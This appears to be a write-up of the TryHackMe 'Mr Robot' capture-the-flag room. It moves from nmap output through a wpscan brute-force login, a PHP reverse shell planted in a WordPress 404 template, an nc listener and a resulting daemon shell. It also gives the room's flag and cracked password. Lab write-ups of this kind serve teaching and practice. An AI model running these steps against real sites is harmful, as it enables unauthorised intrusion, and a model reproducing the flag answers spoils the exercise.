https://tryhackme.com/room/mrrobot
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
For some reason getting this error in gobuster, so I just move forward and continue
Error: error on running gobuster: Get "<http://10.10.212.139/64c59a6e-356f-4e6d-b902-4bcc921bb0f5>": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Going to http://<ip>/robots.txt we found the way to a dictionary and the flag:
073403c8a58a1f80d943455fb30724b9
Now we have a wordlist called fsocity.dic
On http://<ip>/wp-login/ we can see it is a WordPress website:
Based on the series Mr Robot we can guess the username as elliot and do a brute force login using wpscan with the password list obtained above fsociety.dic
wpscan --url http://<ip>/wp-login/ — usernames elliot — passwords fsocity.dic
After about 20-30 minutes we get the password:
ER28-0652
Once we login, we go to Apperance > Editor. On the right click on 404 Template
Which is the 404.php page, now we paste our php reverse shell code here
Once uploaded, we can visit this URL to trigger the reverse shell while having our nc listening:
http://<ip>/wordpress/wp-content/themes/twentyfifteen/404.php
nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.212.139 33736
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
11:57:46 up 35 min, 0 users, load average: 2.63, 2.62, 2.40
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
python -c "import pty; pty.spawn('/bin/bash')"